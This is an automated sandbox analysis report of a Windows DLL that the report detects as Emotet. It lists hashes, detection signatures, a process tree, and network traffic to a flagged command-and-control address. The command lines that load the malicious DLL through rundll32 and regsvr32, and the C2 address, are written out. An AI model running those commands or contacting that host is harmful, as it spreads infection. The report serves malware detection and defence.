Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2V7zjcga5L.dll

Overview

General Information

Sample Name:2V7zjcga5L.dll
Analysis ID:626492
MD5:b65d38f56203a50c2354abaa5af38aa4
SHA1:81fb867e785b6e8505ca59b5de7f46d598a37fc3
SHA256:18ad1fa8e0dcb3b64ff7ef042649fdc602668b4a0978f0351c98177162916139
Tags:exetrojan
Infos:

Detection

Emotet
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6984 cmdline: loaddll64.exe "C:\Users\user\Desktop\2V7zjcga5L.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 7048 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 7104 cmdline: rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • regsvr32.exe (PID: 5860 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 7092 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 7124 cmdline: rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5984 cmdline: rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4632 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5824 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.230423c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              5.2.rundll32.exe.28dc9d20000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                5.2.rundll32.exe.28dc9d20000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.regsvr32.exe.1050000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    7.2.regsvr32.exe.f30000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: 2V7zjcga5L.dllVirustotal: Detection: 32%Perma Link
                      Antivirus detection for URL or domain
                      Source: https://23.239.0.12/S9Avira URL Cloud: Label: malware
                      Source: https://23.239.0.12/w9Avira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.5:49754 version: TLS 1.2
                      Source: 2V7zjcga5L.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000D26C

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: IGSITR=HJk2yqksn3jmOrlkjuqjRrOytL36Pszs0ofIX1jQk/Be1o+ZJK3BH16JgDf6yAW8We2QNZiNZF73x9i8Cr/2lwvuBtCMCqzhtUwH+utXxsaxxeFDiVcXHUnp3RcBPjBK+vqM6Yo3emfENRl9L6E53er+8Ox9ZdSnyBQfUVQqeHCdHLzs9KZ3O1oQ2HgwwRbSVRqsfC5SKTAY5vWLOF/LM1SbrwAwiegfKUsIcWEPMGL5FEJ++dJKJpd/eExNxiNWyzVFKkd3XdxdxGxunr8=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 00000014.00000003.801812539.00000280A8B72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000014.00000003.801812539.00000280A8B72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000014.00000003.801848371.00000280A8B83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.801812539.00000280A8B72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000014.00000003.801848371.00000280A8B83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.801812539.00000280A8B72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000007.00000003.501652096.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828852768.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829069253.00000280A8B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829009677.00000280A80ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/S9
                      Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/s9
                      Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/w9
                      Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000014.00000003.822548470.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822494594.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822517778.00000280A8B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,7_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: IGSITR=HJk2yqksn3jmOrlkjuqjRrOytL36Pszs0ofIX1jQk/Be1o+ZJK3BH16JgDf6yAW8We2QNZiNZF73x9i8Cr/2lwvuBtCMCqzhtUwH+utXxsaxxeFDiVcXHUnp3RcBPjBK+vqM6Yo3emfENRl9L6E53er+8Ox9ZdSnyBQfUVQqeHCdHLzs9KZ3O1oQ2HgwwRbSVRqsfC5SKTAY5vWLOF/LM1SbrwAwiegfKUsIcWEPMGL5FEJ++dJKJpd/eExNxiNWyzVFKkd3XdxdxGxunr8=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.5:49754 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 4.2.rundll32.exe.230423c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.28dc9d20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.28dc9d20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1050000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.f30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1050000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.f30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.230423c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.444094574.0000028DC9D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\TvhlOU\CPyd.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\JoOzHOkj\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A6F0C3_2_00007FFA526A6F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AE6C03_2_00007FFA526AE6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AA77C3_2_00007FFA526AA77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AFB6C3_2_00007FFA526AFB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AAF703_2_00007FFA526AAF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AEB603_2_00007FFA526AEB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AFCA03_2_00007FFA526AFCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A895C3_2_00007FFA526A895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A59443_2_00007FFA526A5944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AAA0C3_2_00007FFA526AAA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526AB5CC3_2_00007FFA526AB5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_010200003_2_01020000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010FF43_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028C203_2_0000000180028C20
